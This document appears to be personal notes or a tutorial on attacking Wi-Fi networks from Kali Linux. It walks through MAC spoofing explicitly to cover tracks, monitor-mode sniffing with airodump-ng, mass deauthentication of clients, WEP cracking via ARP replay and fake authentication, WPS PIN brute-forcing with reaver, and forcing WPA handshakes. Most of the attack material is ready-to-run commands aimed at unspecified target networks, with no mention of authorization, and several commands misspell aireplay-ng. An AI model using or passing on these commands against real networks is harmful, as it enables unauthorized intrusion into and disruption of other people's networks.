Wireless

Adapters: Built-in wireless adapters in retail computers will not perform for what you need. You need a wireless adapter that will support: Monitor Mode & Packet Injection (Explanation).

• Tools are found in the aircrack-ng suite.

Attaching USB Device to VM in VirtualBox

• Start the following process WITHOUT the wireless adapter attached. Do NOT connect it yet.
• Even after you have your adapter installed, recognized and functioning, ALWAYS start Kali with the adapter UNCONNECTED.
• For some reason, Kali VM does not play nicely when booted with the adapter attached. Boot. Attach. Play.

VirtualBox (Host) Setup:

1. In Linux you need to add the current user to the virtualbox group:
   • As root: adduser [username: echo $USER] vboxuser
   • Then you need to logout (of X, of current session) and log back in.
2. Open VirtualBox and click on the machine you want to select it.
3. Go to Settings… USB… Make sure USB is enabled (checkbox is checked).
4. Pick the USB version used by your adapter (1.1, 2.0, or 3.0; mine was 3.0).
5. Click on the icon to the right of the Filter box with the plus sign (+).
   • If you have devices already connected to that version of USB, they will show up in the menu.
6. Now connect the adapter and do #4 again (plus sign).
   • You should see a new entry in the pop-up menu.
   • It will be listed according to the chipset, not the brand name of the adapter.
   • This will be the same chipset you see with lsusb in the host Linux O/S.
7. Click on the adapater (chipset) entry to select it.
8. Click on OK to accept the addition and close the USB menu window.
9. Before starting the VM, physically disconnect the wireless adapter.
10. Start the VM and let it fully load THEN connect your USB wireless adapter (you should see the adapters visual feedback light up).
    • Check to make sure the adapter connection is recognized.
    • Go to the VM menu (all the way on the top): Devices… USB…
    • You should see your adapter/chipset entry selected with a check mark.

Virtual Machine (Guest) Setup:

1. In a term window in your Linux VM, do lsusb. You should see your chipset.
2. Check to see if the adapter was recognized by the O/S. Use one or more of the following:
   • ifconfig or iwconfig or ip a
3. If you do not see a wireless adapter (wlan0, etc.), then you need to install the drivers.
   • https://virtuallyonit.com/2018/09/10/install-a-wireless-adapter-on-kali-linux/
4. Search for the chipset name (e.g., RTL8812AU or realtek, etc.)
   • apt-cache search RTL8812AU or apt-cache search realtek, etc.
5. Install your chipset's driver package.
   • My example: apt install realtek-rtl88xxau-dkms
6. After a successful installation of the package, power down the VM.
7. Remove the USB adapter (if connected), power up the VM, update and upgrade to make sure it works.
   • apt update and then apt full-upgrade
8. For some reason, some folks needed to do a key addition to get the upgrade to work (mine worked fine without it). Also, :

apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6
systemctl restart network-manager

1. Connect your USB wireless adapter. Check in Devices… USB… to make sure it's there. Check lsusb in terminal.
2. Check to see if the adapter was recognized by the O/S (mine worked, got a wlan0):
   • ifconfig or iwconfig or ip a

Network CLI: https://www.tecmint.com/ip-command-examples/

You may need to spoof your address to cover your tracks or to take over a MAC address of someone on the network. First, find your interface name (e.g., wlan0); use one of the following:

ifconfig
ip addr show
ip link show

1. Disable the interface first (two ways, old and new; use one):

ifconfig wlan0 down
ip link set wlan0 down

2A. [Option 1] Change the MAC address (hw ether: hardware ethernet address; (use any addr you want that starts with 00)):

ifconfig wlan0 hw ether 00:11:22:33:44:55
ip link set dev wlan0 address 00:11:22:33:44:55

2B. [Option 2] Use macchanger to do it for you:

macchanger --random wlan0

3. Enable the interface (two ways, old and new; pick one):

ifconfig wlan0 up
ip link set wlan0 up

4. Check it (pick one):

ifconfig
ip addr show
ip link show

5. PAY ATTENTION: your network manager might revert the MAC to original

• If you used macchanger, you probably won't get this problem (although I haven't fully tested it).
• Fix Explained: https://youtu.be/7AUGQNBCddo
• Edit: /etc/NetworkManager/NetworkManager.conf and paste the following at the end of the file:

[device]
wifi.scan-rand-mac-address=no

[connection]
ethernet.cloned-mac-address=preserve
wifi.cloned-mac-address=preserve

• Then restart the NetworkManager:

service network-manager restart

Do an iwconfig to check out wlan0 (or whatever your interface name is): should be Mode: Managed (you need to change to Monitored in order to catch all network traffic).

• Important: It is important that you use ifconfig (or ip) here and not ifup. (See explanation.)

1. Disable the interface.

    ifconfig wlan0 down
    ip link set wlan0 down

2. Kill any process that would interfere with monitor mode (This will kill your network connection. Don't worry. You don't need it.):

airmon-ng check kill

3. Enable monitor mode [1].

iwconfig wlan0 mode monitor

4. Enable the interface.

    ifconfig wlan0 up
    ip link set wlan0 up

Run iwconfig and you should see Mode:Monitor (capture any packet in range).

[1] The mode sets the operating mode of the device:

• ad hoc (network composed of only one cell and without access point)
• managed (node connects to a network composed of many access points, with roaming)
• master (the node is the synchronisation master or acts as an access point)
• repeater (the node forwards packets between other wireless nodes)
• secondary (the node acts as a backup master/repeater)
• monitor (the node is not associated with any cell and passively monitor all packets on the frequency)
• auto

General wireless packet sniffing is done with airodump-ng, part of the aircrack-ng suite.

This will give you general information about the wireless networks around you.

man page: airodump-ng is used for packet capturing of raw 802.11 frames for the intent of using them with air‐ crack-ng. NOTE: Ctrl-c to exit. Syntax:

airodump-ng [options] <interface name>

Must first enable monitor mode (see above). Then run (assuming interface name wlan0):

airodump-ng wlan0  # 2.4Ghz only, quicker

To get airodump to sniff on 5Ghz … or all of them…

airodump-ng --band a wlan0    # 5Ghz, quicker
airodump-ng --band abg wlan0  # 5Ghz + 2.4Ghz, slower

Once you find a target network in the information provided by airodump, move on…

Here you specify the target network (BSSID + Channel) you want to play with…

Target One Specific Network: From the general sniff of all traffic you just did, copy the target BSSID and Channel number:

• Run it without –write filename if you just want to see the network and clients on that network.
• You will see two sections: the top is the network, the bottom shows the clients (“stations”) on the network.

airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write filename wlan0

This creates files in your current working directory (filename*.*).

• .cap file: data captured (everything sent to and from target network)
• If the router is set to encrypt, all the data captured will be encrypted

Wireshark: use it to analyze the data you captured… open the .cap file.

Deauthentication Attack: Disconnect any client from any network…

Tool: aireplay-ng

aireplay-ng --deauth=10000000 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX wlan0
# program     repeat lots        MAC addr router      MAC addr client   wireless adpater

The -c argument is the MAC address of the client machine on the network you are deauthenticating. It is not the MAC address of your attack machine.

• Remember: to get a client MAC address, you run airodump-ng and specify the network in order to see all the clients. The clients show up in the second (lower) block of information, under STATION:

airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X wlan0

This still may fail unless you are also running airodump-ng against the target network (the command just above).

• If your target is wired, you simply connect to it and you're in.
• If your target is wireless w/o encryption, you connect and you're in.
• If your target is wireless + encryption… you need to break in.

WEP: Wired Equivalent Privacy (Old & Easy)

Tool: aircrack-ng (used to crack WEP's Initialization Vector for the key stream)

• The IV is sent in plain text (24-bit randomly generated number)
• The IV is prepended (as a prefix) to the WEP key for decryption of packets
• IV + Key (password) = Key Stream

All you need to do is capture a bunch of packets (airodump-ng), analyze the captured IVs (aircrack-ng) and discover the WEP key.

1. Capture specific BSSID + Channel as above. Store capture in file.
   • The #DATA column shows the number of useful packets w/ unique WEP IVs.
   • The higher the number the more likely you'll be able to crack the key.
2. Run aircrack-ng against your airodump-ng capture (.cap) file.

aircrack-ng filename.cap

Take the key from aircrack (XX:XX:XX:XX:XX), remove the colons, and use that number to log into the network.

PROBLEM: If the network isn't busy enough, the #DATA will not increase enough.

SOLUTION: Generate your own traffic… force access point to generate new IVs.

• Run an “arpreplay” attack
• We cannot connect to the AP but we can associate with it.

TOOL: aireply-ng

1. Run airodump-ng against your target network (as above) in one term window:

airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write filename wlan0

2. Associate with this network with aireply-ng in another term window:

aireply-ng --fakeauth 0 -a [MAC of target router] -h [MAC of wireless adapter] wlan0
# run fake authentication attack once ("0")

3. Now communicate with the network with which you are associated via aireply-ng:

• Inject packets into router to force it to generate new IVs.
• Use an ARP reply/request attack…
• THEORY: capture an ARP packet, re-transmit it thus forcing the router to produce another packet with new IV. Lather, rinse, repeat.

aireply-ng --arpreplay -b [MAC of target router] -h [MAC of wireless adapter] wlan0

4. Then run aircrack-ng (filename should be something like arpreplay-01.cap)

aircrack-ng filename.cap

The only difference is the ecryption method: WPA uses TKIP and WPA2 uses CCMP. The same methods will work with both WPA and WPA2.

Misconfiguration Exploit: WPS (allows clients to connect without the password).

• Originally provided to simplify connecting printers and other peripherals.
• “PBC”: Push Button Configuration (peripherals and router had a WPS button).
• Authenticates against an 8-digit PIN (8 numbers). Easy hack.
• Router, however, must be misconfigured to use PIN authentication, NOT the PBC.
• Check this first (since WPA/WPA2 are so difficult to crack).

1. TOOL: wash (display all networks with WPS enable). You may need to put your wireless interface into auto mode instead of monitor mode.

wash --interface wlan0     # if this errors out, do the following...
ifconfig wlan0 down        # or ifdown wlan0
iwconfig wlan0 mode auto
ifconfig wlan0 up          # or ifup wlan0
wash --interface wlan0     # remember to change mode back to monitor for the hacks

2. Associate with the network (as above)… set this up but DO NOT RUN IT YET…

aireply-ng --fakeauth 30 -a [MAC of target router] -h [MAC of wireless adapter] wlan0
# associate with the target network every 30 seconds

3. In another term window run reaver to brute force the PIN:

reaver --bssid [MAC of target router] --channel [#] --interface wlan0 -vvv --no-associate

4. Launch reaver and then your aireply-ng you set up but did not run.

• If WPS is not misconfigured or PBC is set… then this won't work. Move on…

WPA/WPA2 CRACKING: The only packets that can aid cracking are the handshake packets.

• These are 4 packets sent when a client connects to the network

1. Run airodump-ng against all reachable networks…

airodump-ng wlan0               # 2.4Ghz only, quicker
airodump-ng --band a wlan0      # 5Ghz, quicker
airodump-ng --band abg wlan0    # 5Ghz + 2.4Ghz, slower

2. Find your target router and run airodump-ng to dump data to a file…

airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write filename wlan0

3. Let it run and wait for the handshake to occur (someone to connect to router).

4. If you're impatient, deauthenticate a current user and he'll connect again, giving you the handshake you want.

aireplay-ng --deauth 4 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX wlan0
# program     repeat 4x   MAC addr router      MAC addr client to disconnect

5. Use that WPA handshake value to get the key for the wireless network (see next).

We'll have some more goodies later…